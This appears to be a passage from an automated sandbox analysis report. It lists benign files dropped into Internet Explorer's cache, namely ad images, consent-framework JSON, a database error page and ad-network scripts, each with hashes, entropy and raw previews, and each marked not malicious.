                                                                                                                                                                                                                  Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...N..+...L%;...8.].E.{.....s.%szJ..8...!...[^..-vFG3E.e.>\.N.OB{..$..K`[.-%...c...5...PV..H....(......#....9N~...<.@#.h.h......).P.L.....r.Z..y.T..<..VoY"..C.h.|..{y...V....k_@.V%,p....zT....liV.....J.(.(...S.).X..0T......J..$...2.NQ..Xz5r.z..h$..o.LF..:...D.....?..Q....H....WW...+zuS..t.W..Ny....q..Mh..+...7kC~.....9.~...Z.(........E....n......(.....B.S.....R........?.5..-.
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\AARm6r5[1].jpg
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 300x250, frames 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):17703
                                                                                                                                                                                                                  Entropy (8bit):7.948335335138899
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:+qOQvDg5PuGI2FJ+7euVXqjJFBloj5XNk+Y565p/oq6bLOHA6rz7FRT:+7eGIS+7euV6jJFBe9XmZ56noq4fozBV
                                                                                                                                                                                                                  MD5:AF8B89FA03344C236767C0FED93A3635
                                                                                                                                                                                                                  SHA1:8CEAF3DA8CB0994F5F54BEC5A09C6408C459ED82
                                                                                                                                                                                                                  SHA-256:06EFB97DCE1ADE37742C16ED656371F172BC549D752B1EE301411E08E508ED0A
                                                                                                                                                                                                                  SHA-512:42AC09528A1C9FD541F34CC7F58ECA9281ED536EC5FCA9E3484A9B47BEDCE45611C6E2845EDD42042146CBBE9FE2D44201AC71CD62A20344216E3048E6645D0C
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO........,...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.~.&...B.<Do...Z.,;.T..K..Z'y@..,[eI.%s.<f...9..RS..#uC..R...7v..,F.y..gQlt...!.....Rd..E.........+...iI.Sh.Y......5......Ex.....gfYf....M.Q.I.6...C5!...0....l...'B6dzVmZEKb..~D..o...D..L.I.+..m+...uf>.v./n....._..z.R4J.Uv...5pVD..M.,m..N+H...5d.t6.Kx..X...4..:~#.qEy...r0.rm=.v....<.;..8..z...:#.".{.......OK..........y5.jRz...Sp.{V..c).YF...]......g....M...D.H..z.^.D7....
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\AARmt9G[1].jpg
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 300x250, frames 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):10526
                                                                                                                                                                                                                  Entropy (8bit):7.927345671317898
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:QtHL+Dun0sH2/rauOIAzigvbHdvNKh5crngQ04ArL5UEEIsKIbZNHg:+S2pWgIAFRvNeUgQ9C5UEEBtHg
                                                                                                                                                                                                                  MD5:076B1B6F3B46740679FA703FE7EDF5E6
                                                                                                                                                                                                                  SHA1:A961FF54B4D6A170FA42366CA3F79DCC9DB55763
                                                                                                                                                                                                                  SHA-256:7EC4C91055D6BF21250D3754A2E7ACC1BCCF7B61215D218F10078E2DC4F22A67
                                                                                                                                                                                                                  SHA-512:77C447AFB5049BF02F8CA136840307AB618DBEB584123AF98C2FBA597C2E902789A74F0451BB00EF891E87EF19A84F9F6557CD2747E5329264DEB600F42CE712
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO........,...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..H....d...........V.C.^......Q`5t.<..@.RDI.....ac.Qd..]...,4.V4.P.)...4...ld..#a..A.gW7..hp..O0.{W...p.1T4..2M....3.W.CK...e.@..%..a..)#<T9....[.....)....G.!a..0......,ZD......%....:.!.X.Y.B6n.A..1.m.Y.n.ap...#..E.L.=&.-..PM4....B.,.Kc..Y..f..#.cB.:.E2........L.".B...`.qL......zSBn..z..`.(...........qJ .2.Cv..x.eD.Sr..).,.y...i.3...m.Fh..W# ..J.g...[.j.lJz..q..h.....l.w.m
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\AARmvNW[1].jpg
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 100x75, frames 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2881
                                                                                                                                                                                                                  Entropy (8bit):7.85955245042214
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:QfAuETAv+2XacTEbp8Cq7KtgO8BzwAtFhp3cGByPBPOKrkNbUTol:Qf7ET2q0EbHtvYMKCYykz
                                                                                                                                                                                                                  MD5:C51479837063AC740FF33D4EDCF910B6
                                                                                                                                                                                                                  SHA1:5144AA2ABC2DE143AFECC36C06F3E1AFF408B4B8
                                                                                                                                                                                                                  SHA-256:B11870B80969AD463F4BA768F5D84636A309F7E96E2D3C76CDE5FBA38C5E7A80
                                                                                                                                                                                                                  SHA-512:05297A6F040C6323CBBDE63255B255812631785488811AE40D26316059166B7677385BEEDC122AC4738EF6B9E6755E449BBC87C9B6CDADFFF049502AB2843044
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......K.d...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.ez..............zVu...)+.......VI{u4.H.@..q.5...,i.i...[^.J.....,..i.3..m.Y.d[X4..DHky...x...RLM.y..+q.i......<...t.x...F..Fk.....-.:....@...j.Az.......e.3j..W3.V...~....m...v.'.=My.i....m...'8.K.4Td.6..."E.O..hRL%I.w....Z....=s...<.en.5znQ..t..p.LA@..,p......(..A5...ea.2N.N=..\\.a.;0P...^..MS.SIm..1..2"..n...+..l..".1.Sb|...1`?:-sH.h.G.SJf.....q?..ObZ...8........(.mK.E...
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\BB1cEP3G[1].png
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                  File Type:PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1088
                                                                                                                                                                                                                  Entropy (8bit):7.81915680849984
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:FCGPRm4XxHvhNBb6W3bc763IU6+peaq90IUkiRPfoc:/pXBvkW3bc7k1FqWIUkSfB
                                                                                                                                                                                                                  MD5:24F1589A12D948B741C2E5A0C4F19C2A
                                                                                                                                                                                                                  SHA1:DC9BB00C5D063F25216CDABB77F5F01EA9F88325
                                                                                                                                                                                                                  SHA-256:619910A3140A45391D7D3CB50EC4B48F0B0C8A76DC029576127648C4BD4B128C
                                                                                                                                                                                                                  SHA-512:5D7A17B05E1FD1BC02823EC2719D30BC27A9FA03BCFFE30F3419990E440845842F18797C9071C037417776641AB2CDB86F1F6CD790D70481B3F863451D3249EE
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: .PNG........IHDR................U....pHYs..........+......IDATx...]..U.....d..6YwW(.UV\.v.>.>..`.K}X).i..Tj...C..RD. ..AEXP.............]).vQ../$.%.l2.....dH&.YiOr93.....~..u.S...5........J.&..;.JN..z....2..;q.4..I .....c!....2;*J........l(......?.m+......V...g3.0..............C..GB.$..M.....jl.M..~6?.........../a%...;....E.by.J..1.$...".&.DX..W..jh.....=...aK...[.#....].. ....:Q....X.........uk.6.0...e7..RZ..@@H..k........#......[..C.-.AbC.fK.(a.<.^p.j`...._>{<....`.........%.L...q.G...).2oc{....vQ...N5..%m-ky19..F.S....&..../..F......y.(.8.1..>?Zr......Q.`.e.|0.&m.E....=[aN..r.+....2B/f8.v..n...N..=........i.^....s&..Hr.z.....M......:........EF.....0.. .N.x............N.pO.#2...df=...Fa..B#2yU....O.;.g....b.}ct.&.7x*..t.Y..yg....]..){.,.v.F.e.ZF.z..Ur+..^..].#.]....~..}..{g.W0?....&....6n....p\.=.]..X...F.]...\s5OK.3Wb.#.M/fT...:^.M}...:t.......!..g......0t.h..8..4cB....px..............1.!...}=...Qb$W.*..."............V....!.y......<H
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\BB1ftEY0[1].png
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):497
                                                                                                                                                                                                                  Entropy (8bit):7.316910976448212
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:6v/7YEtTvpTjO7q/cW7Xt3T4kL+JxK0ew3Jw61:rEtTRTj/XtjNSJMkJw61
                                                                                                                                                                                                                  MD5:7FBE5C45678D25895F86E36149E83534
                                                                                                                                                                                                                  SHA1:173D85747B8724B1C78ABB8223542C2D741F77A9
                                                                                                                                                                                                                  SHA-256:9E32BF7E8805F283D02E5976C2894072AC37687E3C7090552529C9F8EF4DB7C6
                                                                                                                                                                                                                  SHA-512:E9DE94C6F18C3E013AB0FF1D3FF318F4111BAF2F4B6645F1E90E5433689B9AE522AE3A899975EAA0AECA14A7D042F6DF1A265BA8BC4B7F73847B585E3C12C262
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: .PNG........IHDR................a....pHYs..........+......IDATx....N.A..=.....bC...RR..`'......v.{:.^..... ."1.2....P..p.....nA......o.....1...N4.9.>..8....g.,...|."...nL.#..vQ.......C.D8.D.0*.DR)....kl..|.......m...T..=.tz...E..y..... ..S.i>O.x.l4p~w......{...U..S....w<.;.A3...R*..F..S1..j..%...1.|.3.mG..... f+.,x....5.e..]lz..*.).1W..Y(..L`.J...xx.y{.*.\. ...L..D..\N........g..W...}w:.......@].j._$.LB.U..w'..S......R..:.^..[\.^@....j...t...?..<.............M..r..h....IEND.B`.
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\BB1kKVy[1].png
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                  File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):898
                                                                                                                                                                                                                  Entropy (8bit):7.694927757951535
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:AoSFwQNh8iuQ/HM5V7Wp7Cxf2aA5DbK1cbr:AoUNhtuQE59WpWx+a6Pl
                                                                                                                                                                                                                  MD5:2FAD21634CA0EC2AEF0D32E72748CCFB
                                                                                                                                                                                                                  SHA1:4D4727E108164985D0722A32035F58FA0BDAD19E
                                                                                                                                                                                                                  SHA-256:A8FD087BD67E5CEBC1B90AB2E4DD94847B947B849EEBDE4E816DF54ABE66C589
                                                                                                                                                                                                                  SHA-512:30D075B21AB5891C2FB8684DE64F784F0F65784307C36076ADB745131C0E9CABE89DFC5C74BC9BBF210620D1A525E9FAC1626BBB35B49946955C609378D3B185
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: .PNG........IHDR.............;0......pHYs..........+.....4IDATx..]H.Q.....6.u!.t..)MQ'.e..S2e.Md^...F....cB.0...J..B.0..(J.4P.#J..A.................|<.s...I.?.&...^p..w$....Q;...P..).G....n@0.........D.z=p..E...j......Z..E..Z$..;./....=RpR......z..'..)8'$si..(....!.]!..0...CVmH.Xp(...#..0Y.....&...t.b.`..3....P..._"...9....z.&''{;::../.......SoB...61].8..77..df......d..........KMMM....k..."?...w.....*.$....Q?m..$..=/.w.Juw..xOnn.?...j5...+].W..bI.....?.v..bU......!.)..,w*.>.sR.=.7[;...q.._...K..._.U...........|.....P*........[.}.;.o.{Ui....>.O...X..b1.........l{{.{~6.b...x..j....rS"...a/,4h....H.P...p.H.....}h4.2..E....0..fg.V.>..+....2D..D...j...d2-A1..R)sk..\^^..t:...lnll.s8..A`>.6.%.O..f...{`4.5II..4?S.g..j....!V..`....F.IK.B.v.rm...n........l@.T.c.9*......C6...H8)....,.`.\.....0666.9*h.....?............j.>.8STl..G...t..P..6.....eO.......IEND.B`.
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\BBH3Kvo[1].png
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):579
                                                                                                                                                                                                                  Entropy (8bit):7.468727026221326
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:6v/7ziAVG8tUZ8VveAL8S6mbRRkeYZ2GlguM+7Kf03NE3Emns6F9:uisI8x5L8ub7keYZ2GlLsMi06F9
                                                                                                                                                                                                                  MD5:FDC96E25125ACA9FAA9328286DF59A3C
                                                                                                                                                                                                                  SHA1:AE96A116A24EC53C3D1E2F386435F6CE6B6B6F08
                                                                                                                                                                                                                  SHA-256:201E3277C624BCFDAF85CA20EE8BA8A22D8D3BFF44FDAD41FC23CB07AE0E9A40
                                                                                                                                                                                                                  SHA-512:98591D2D6F7C0DF27DDE63572C3751974323B6A34CCE14845D418E32E17177DF27F612CDBD9F44B24AFC5C259CEE37CBCD08DDA0DB9A81434169DE9BB2CD8D24
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: .PNG........IHDR................a....pHYs..........+......IDATx..S=..A.=.....U$..I.Z.b.HlR........)B*.;..i^....Im.*.(ba'b.I._...*..y..vy.G...{.g...........P.c.Y..P..(..uv=....|VF....$.I..n....@..E.....t.+@.RA>..b.@0...w1...\...d...F...H..B.......V<.n6..R)..f..$..L.S8.Nd2...s...qD.Q.F#,.K.j..R...\...P..n..a.F..b.~........E6.....:..'.n.0.F..~..|.....x........`0.J....>..UD?..__.`D...7x.....jK@.....x...m..\....O`y)C.'j.\..~..G..I`..........Z)'a.d..&$IB.\...UI.d......x...P(.p8.2........w@.5..n..j.aT#...........Y..5VB....f..;..f8..-...w...a......IEND.B`.
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\a8a064[2].gif
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                  File Type:GIF image data, version 89a, 28 x 28
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):16360
                                                                                                                                                                                                                  Entropy (8bit):7.019403238999426
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:g2SEiHys4AeP/6ygbkUZp72i+ccys4AeP/6ygbkUZaoGBm:g2Tjs4Ae36kOpqi+c/s4Ae36kOaoGm
                                                                                                                                                                                                                  MD5:3CC1C4952C8DC47B76BE62DC076CE3EB
                                                                                                                                                                                                                  SHA1:65F5CE29BBC6E0C07C6FEC9B96884E38A14A5979
                                                                                                                                                                                                                  SHA-256:10E48837F429E208A5714D7290A44CD704DD08BF4690F1ABA93C318A30C802D9
                                                                                                                                                                                                                  SHA-512:5CC1E6F9DACA9CEAB56BD2ECEEB7A523272A664FE8EE4BB0ADA5AF983BA98DBA8ECF3848390DF65DA929A954AC211FF87CE4DBFDC11F5DF0C6E3FEA8A5740EF7
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: GIF89a.......dbd...........lnl.........trt..................!..NETSCAPE2.0.....!.......,..........+..I..8...`(.di.h..l.p,..(.........5H.....!.......,.........dbd...........lnl......dfd....................../..I..8...`(.di.h..l..e.....Q... ..-.3...r...!.......,.........dbd..............tvt...........................*P.I..8...`(.di.h.v.....A<.. ......pH,.A..!.......,.........dbd........|~|......trt...ljl.........dfd......................................................B`%.di.h..l.p,.t]S......^..hD..F. .L..tJ.Z..l.080y..ag+...b.H...!.......,.........dbd.............ljl.............dfd........lnl..............................................B.$.di.h..l.p.'J#............9..Eq.l:..tJ......E.B...#.....N...!.......,.........dbd...........tvt.....ljl.......dfd.........|~|.............................................D.$.di.h..l.NC.....C...0..)Q..t...L:..tJ.....T..%...@.UH...z.n.....!.......,.........dbd..............lnl.........ljl......dfd...........trt...
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\checksync[1].htm
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):204
                                                                                                                                                                                                                  Entropy (8bit):4.753212018409155
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6:ljggS5oc/bLiuggS5oc/bLiuggS5oc/bL7:+DpxgDpxgDp7
                                                                                                                                                                                                                  MD5:AA0EC763639C9094D9BE1B0D491AC65A
                                                                                                                                                                                                                  SHA1:9A0E137BD9EB21908016360FBB2DAD6AED37CAE4
                                                                                                                                                                                                                  SHA-256:4D2671D4C5D04438C3447C787ADF222D33AB22C91222ABB1B5524ED586B42C01
                                                                                                                                                                                                                  SHA-512:9A812C4C097D864E757CE84D98542EA239150D61184E2BF1BB62EB9E97F8730ADBB96D00F95B0386FC4B93E82347450ADE2A77E5B495708C0438C7DCF5BCEF81
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: Connection failed: SQLSTATE[HY000] [2006] MySQL server has gone awayConnection failed: SQLSTATE[HY000] [2006] MySQL server has gone awayConnection failed: SQLSTATE[HY000] [2006] MySQL server has gone away
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\de-ch[1].json
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                  File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):79097
                                                                                                                                                                                                                  Entropy (8bit):5.337866393801766
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:768:olAy9XsiItnuy5zIux1whjCU7kJB1C54AYtiQzNEJEWlCgP5HVN/QZYUmftKCB:olLEJxa4CmdiuWlDxHga7B
                                                                                                                                                                                                                  MD5:408DDD452219F77E388108945DE7D0FE
                                                                                                                                                                                                                  SHA1:C34BAE1E2EBD5867CB735A5C9573E08C4787E8E7
                                                                                                                                                                                                                  SHA-256:197C124AD4B7DD42D6628B9BEFD54226CCDCD631ECFAEE6FB857195835F3B385
                                                                                                                                                                                                                  SHA-512:17B4CF649A4EAE86A6A38ABA535CAF0AEFB318D06765729053FDE4CD2EFEE7C13097286D0B8595435D0EB62EF09182A9A10CFEE2E71B72B74A6566A2697EAB1B
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: {"DomainData":{"pclifeSpanYr":"Year","pclifeSpanYrs":"Years","pclifeSpanSecs":"A few seconds","pclifeSpanWk":"Week","pclifeSpanWks":"Weeks","cctId":"55a804ab-e5c6-4b97-9319-86263d365d28","MainText":"Ihre Privatsph.re","MainInfoText":"Wir verarbeiten Ihre Daten, um Inhalte oder Anzeigen bereitzustellen, und analysieren die Bereitstellung solcher Inhalte oder Anzeigen, um Erkenntnisse .ber unsere Website zu gewinnen. Wir geben diese Informationen auf der Grundlage einer Einwilligung und eines berechtigten Interesses an unsere Partner weiter. Sie k.nnen Ihr Recht auf Einwilligung oder Widerspruch gegen ein berechtigtes Interesse aus.ben, und zwar auf der Grundlage eines der folgenden bestimmten Zwecke oder auf Partnerebene .ber den Link unter jedem Zweck. Diese Entscheidungen werden an unsere Anbieter, die am Transparency and Consent Framework teilnehmen, signalisiert.","AboutText":"Weitere Informationen","AboutCookiesText":"Ihre Privatsph.re","ConfirmText":"Alle zulassen","AllowAll
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\e151e5[1].gif
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                  File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):43
                                                                                                                                                                                                                  Entropy (8bit):3.122191481864228
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:CUTxls/1h/:7lU/
                                                                                                                                                                                                                  MD5:F8614595FBA50D96389708A4135776E4
                                                                                                                                                                                                                  SHA1:D456164972B508172CEE9D1CC06D1EA35CA15C21
                                                                                                                                                                                                                  SHA-256:7122DE322879A654121EA250AEAC94BD9993F914909F786C98988ADBD0A25D5D
                                                                                                                                                                                                                  SHA-512:299A7712B27C726C681E42A8246F8116205133DBE15D549F8419049DF3FCFDAB143E9A29212A2615F73E31A1EF34D1F6CE0EC093ECEAD037083FA40A075819D2
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\iab2Data[1].json
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                  File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):271194
                                                                                                                                                                                                                  Entropy (8bit):5.144309124586737
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:l3JqIHQCSq23YILFMPpWje+KULpfqjI9zT:hqCSVyIeiijq
                                                                                                                                                                                                                  MD5:69E873EC1DB1AA38922F46E435785B61
                                                                                                                                                                                                                  SHA1:0E17DD5D16C19D40847AEEEC9AF898BB7F228801
                                                                                                                                                                                                                  SHA-256:D90C45999873C12E05B6A850C7C5473E1CB3DA9BD087DB5F038F56ABD65F108C
                                                                                                                                                                                                                  SHA-512:27F403FDC906C317F4023735B29ABB090867CAA41103CE2FD19E487323EBEE15884DF10A353741C218BB83C748464BE3D75459F5D086FDE983DB85FC86ADA4D4
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: {"gvlSpecificationVersion":2,"tcfPolicyVersion":2,"features":{"1":{"descriptionLegal":"Vendors can:\n* Combine data obtained offline with data collected online in support of one or more Purposes or Special Purposes.","id":1,"name":"Match and combine offline data sources","description":"Data from offline data sources can be combined with your online activity in support of one or more purposes"},"2":{"descriptionLegal":"Vendors can:\n* Deterministically determine that two or more devices belong to the same user or household\n* Probabilistically determine that two or more devices belong to the same user or household\n* Actively scan device characteristics for identification for probabilistic identification if users have allowed vendors to actively scan device characteristics for identification (Special Feature 2)","id":2,"name":"Link different devices","description":"Different devices can be determined as belonging to you or your household in support of one or more of purposes."},"3":{"de
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\nrrV52461[1].js
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):91348
                                                                                                                                                                                                                  Entropy (8bit):5.423638505240867
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:uEuukXGs7ui3gn7qeOdillEx5Q3YzuCp9oZuvby3TdXPH6viqQDnjs2i:aKiw0di378uQMfHgjV
                                                                                                                                                                                                                  MD5:9C4A60B2332E94D3BFF324BD8DF61A31
                                                                                                                                                                                                                  SHA1:6245D60C273E175D3EC798CE8ABB65AD75F24E09
                                                                                                                                                                                                                  SHA-256:8C38115211EB4E291CE6F38629C8AEE0F882EBED06B66F3DB3D6587C1EBDF52F
                                                                                                                                                                                                                  SHA-512:31830D8DE79206C5C5B178DBC798D3A2AF597BA14D9075EE25CC82B096083B180B0B41CB5DC24640AC2A8329575102A3D724DA1F4307DDFB57DBC5C64A873817
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: var _mNRequire,_mNDefine;!function(){"use strict";var c={},u={};function a(e){return"function"==typeof e}_mNRequire=function e(t,r){var n,i,o=[];for(i in t)t.hasOwnProperty(i)&&("object"!=typeof(n=t[i])&&void 0!==n?(void 0!==c[n]||(c[n]=e(u[n].deps,u[n].callback)),o.push(c[n])):o.push(n));return a(r)?r.apply(this,o):o},_mNDefine=function(e,t,r){if(a(t)&&(r=t,t=[]),void 0===(n=e)||""===n||null===n||(n=t,"[object Array]"!==Object.prototype.toString.call(n))||!a(r))return!1;var n;u[e]={deps:t,callback:r}}}();_mNDefine("modulefactory",[],function(){"use strict";var r={},e={},o={},i={},t={},n={},a={},d={},c={},l={};function g(r){var e=!0,o={};try{o=_mNRequire([r])[0]}catch(r){e=!1}return o.isResolved=function(){return e},o}return r=g("conversionpixelcontroller"),e=g("browserhinter"),o=g("kwdClickTargetModifier"),i=g("hover"),t=g("mraidDelayedLogging"),n=g("macrokeywords"),a=g("tcfdatamanager"),d=g("l3-reporting-observer-adapter"),c=g("editorial_blocking"),l=g("debuglogs"),{conversionPixelCo
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\otTCF-ie[1].js
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                  File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):103536
                                                                                                                                                                                                                  Entropy (8bit):5.315961772640951
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:768:nq79kuJrnt6JjU7cVbkhS/G+FBlTjmSmjCRp0QRaPXJHJVhXKNTUCL29kJlXYoXY:49jht4bbkAOCRpl6TVgTUCLBX10UU/px
                                                                                                                                                                                                                  MD5:6E60674C04FFF923CE6E30A0CD4B1A04
                                                                                                                                                                                                                  SHA1:D77ED2B9FA6DD82C7A5F740777CC38858D9CBDDD
                                                                                                                                                                                                                  SHA-256:48221F1DE0F509D6C365D9F4BA1D7DB8619E01C6BC4AC8462536836E582CDC66
                                                                                                                                                                                                                  SHA-512:62F5068BDEDBA361DAD0B50B66F617A2A964B9D3DB748BF9DE29C4F6307B1891AF9A4D384F3CEB25C77B62D245F338D967084301391A41BAB9772E2632B36B96
                                                                                                                                                                                                                  Malicious:false
